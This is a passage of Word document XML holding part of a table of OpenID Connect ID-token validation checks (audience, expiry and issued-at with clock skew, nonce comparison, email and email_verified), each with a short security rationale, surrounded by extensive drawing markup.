                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = our client id</w:t>
            </w:r>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FF688D0"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 xml:space="preserve">Without this, a token legitimately issued to any other Google OAuth client replays here with a perfectly valid signature. The </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>most commonly omitted</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> check in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hand-written</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> OIDC code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="74ECD9DD" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="435"/>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0841723"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4</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6784180" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52"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1056" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56A43A32" wp14:editId="75598713">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-24708</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="542925" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29666" name="Group 29666"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="542925" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="542925" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2677" name="Shape 2677"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="228600" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="228600" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="219075" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="221705" y="0"/>
                                        <a:pt x="223950" y="930"/>
                                        <a:pt x="225810" y="2791"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="227670" y="4638"/>
                                        <a:pt x="228600" y="6896"/>
                                        <a:pt x="228600" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="228600" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="228600" y="135979"/>
                                        <a:pt x="227670" y="138212"/>
                                        <a:pt x="225810" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="223950" y="141932"/>
                                        <a:pt x="221705" y="142863"/>
                                        <a:pt x="2190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680" name="Shape 2680"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="314325" y="0"/>
                                  <a:ext cx="228600" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="228600" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="219075" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="221705" y="0"/>
                                        <a:pt x="223950" y="930"/>
                                        <a:pt x="225810" y="2791"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="227670" y="4638"/>
                                        <a:pt x="228600" y="6896"/>
                                        <a:pt x="228600" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="228600" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="228600" y="135979"/>
                                        <a:pt x="227670" y="138212"/>
                                        <a:pt x="225810" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="223950" y="141932"/>
                                        <a:pt x="221705" y="142863"/>
                                        <a:pt x="2190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666" style="width:42.75pt;height:11.25pt;position:absolute;z-index:-2147483454;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.94556pt;" coordsize="5429,1428">
                      <v:shape id="Shape 2677" style="position:absolute;width:2286;height:1428;left:0;top:0;" coordsize="228600,142875" path="m9525,0l219075,0c221705,0,223950,930,225810,2791c227670,4638,228600,6896,228600,9525l228600,133350c228600,135979,227670,138212,225810,140072c223950,141932,221705,142863,219075,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 2680" style="position:absolute;width:2286;height:1428;left:3143;top:0;" coordsize="228600,142875" path="m9525,0l219075,0c221705,0,223950,930,225810,2791c227670,4638,228600,6896,228600,9525l228600,133350c228600,135979,227670,138212,225810,140072c223950,141932,221705,142863,219075,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exp</w:t>
            </w:r>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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2E75B6A6"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60s skew; future-dated tokens refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="76816B48" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="446"/>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3D6EF224"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5</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44C167C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52"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2080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="069FC7DC" wp14:editId="3AC30263">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="342900" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29751" name="Group 29751"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="342900" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="342900" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2684" name="Shape 2684"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="342900" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="342900" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="333375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="336005" y="0"/>
                                        <a:pt x="338250" y="918"/>
                                        <a:pt x="340110" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="341970" y="4638"/>
                                        <a:pt x="342900" y="6883"/>
                                        <a:pt x="342900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="342900" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="342900" y="126454"/>
                                        <a:pt x="341970" y="128687"/>
                                        <a:pt x="340110" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="338250" y="132407"/>
                                        <a:pt x="336005" y="133338"/>
                                        <a:pt x="333375" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133338"/>
                                        <a:pt x="4650" y="132407"/>
                                        <a:pt x="2790" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128687"/>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51" style="width:27pt;height:10.5pt;position:absolute;z-index:-2147483448;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="3429,1333">
                      <v:shape id="Shape 2684" style="position:absolute;width:3429;height:1333;left:0;top:0;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,918,340110,2778c341970,4638,342900,6883,342900,9525l342900,123825c342900,126454,341970,128687,340110,130547c338250,132407,336005,133338,333375,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6883,930,4638,2790,2778c4650,918,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nonce</w:t>
            </w:r>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60770DB" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="45"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3104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="663F6408" wp14:editId="28ED7F78">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>71438</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-20977</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="695325" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29819" name="Group 29819"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="695325" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="695325" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2686" name="Shape 2686"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="695325" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="695325" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="685800" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="688430" y="0"/>
                                        <a:pt x="690675" y="918"/>
                                        <a:pt x="692535" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="694395" y="4638"/>
                                        <a:pt x="695325" y="6883"/>
                                        <a:pt x="695325" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="695325" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="695325" y="126454"/>
                                        <a:pt x="694395" y="128687"/>
                                        <a:pt x="692535" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="690675" y="132407"/>
                                        <a:pt x="688430" y="133338"/>
                                        <a:pt x="685800" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133338"/>
                                        <a:pt x="4650" y="132407"/>
                                        <a:pt x="2790" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128687"/>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819" style="width:54.75pt;height:10.5pt;position:absolute;z-index:-2147483446;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.625pt;mso-position-vertical-relative:text;margin-top:-1.65179pt;" coordsize="6953,1333">
                      <v:shape id="Shape 2686" style="position:absolute;width:6953;height:1333;left:0;top:0;" coordsize="695325,133350" path="m9525,0l685800,0c688430,0,690675,918,692535,2778c694395,4638,695325,6883,695325,9525l695325,123825c695325,126454,694395,128687,692535,130547c690675,132407,688430,133338,685800,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6883,930,4638,2790,2778c4650,918,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hash_equals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> against this flow's value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="753524FA" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="435"/>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DFD8E4F"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6</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3494EEE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52"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4128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A3FDC09" wp14:editId="3EE91D03">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-26649</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="342900" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29896" name="Group 29896"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="342900" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="342900" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2690" name="Shape 2690"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="342900" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="342900" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="333375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="336005" y="0"/>
                                        <a:pt x="338250" y="930"/>
                                        <a:pt x="340110" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="341970" y="4638"/>
                                        <a:pt x="342900" y="6896"/>
                                        <a:pt x="342900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="342900" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="342900" y="126454"/>
                                        <a:pt x="341970" y="128687"/>
                                        <a:pt x="340110" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="338250" y="132407"/>
                                        <a:pt x="336005" y="133338"/>
                                        <a:pt x="333375" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133338"/>
                                        <a:pt x="4650" y="132407"/>
                                        <a:pt x="2790" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128687"/>
                                        <a:pt x="0" y="126454"/>
                                        <a:pt x="0" y="123825"/>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896" style="width:27pt;height:10.5pt;position:absolute;z-index:-2147483442;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-2.09839pt;" coordsize="3429,1333">
                      <v:shape id="Shape 2690" style="position:absolute;width:3429;height:1333;left:0;top:0;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342900,6896,342900,9525l342900,123825c342900,126454,341970,128687,340110,130547c338250,132407,336005,133338,333375,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>email</w:t>
            </w:r>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> present</w:t>
            </w:r>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E65DF53"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It is what we match a staff record on</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="5E111D05" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="439"/>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2D88302"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7</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726A4B1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52"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5152" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="100ACA78" wp14:editId="090610EC">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="866775" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="30035" name="Group 30035"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="866775" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="866775" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2695" name="Shape 2695"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="866775" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="866775" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="857250" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="859880" y="0"/>
                                        <a:pt x="862125" y="930"/>
                                        <a:pt x="863985" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="865845" y="4638"/>
                                        <a:pt x="866775" y="6896"/>
                                        <a:pt x="866775" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="866775" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="866775" y="135979"/>
                                        <a:pt x="865845" y="138224"/>
                                        <a:pt x="863985" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="862125" y="141945"/>
                                        <a:pt x="859880" y="142875"/>
                                        <a:pt x="857250" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142875"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138224"/>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035" style="width:68.25pt;height:11.25pt;position:absolute;z-index:-2147483437;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="8667,1428">
                      <v:shape id="Shape 2695" style="position:absolute;width:8667;height:1428;left:0;top:0;" coordsize="866775,142875" path="m9525,0l857250,0c859880,0,862125,930,863985,2778c865845,4638,866775,6896,866775,9525l866775,133350c866775,135979,865845,138224,863985,140084c862125,141945,859880,142875,857250,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>email_verified</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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088E049"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On a consumer account an unverified address proves nothing about who controls it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="520D2820" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="671"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313"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5193341D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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tcPr>
          <w:p w14:paraId="17431A93" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
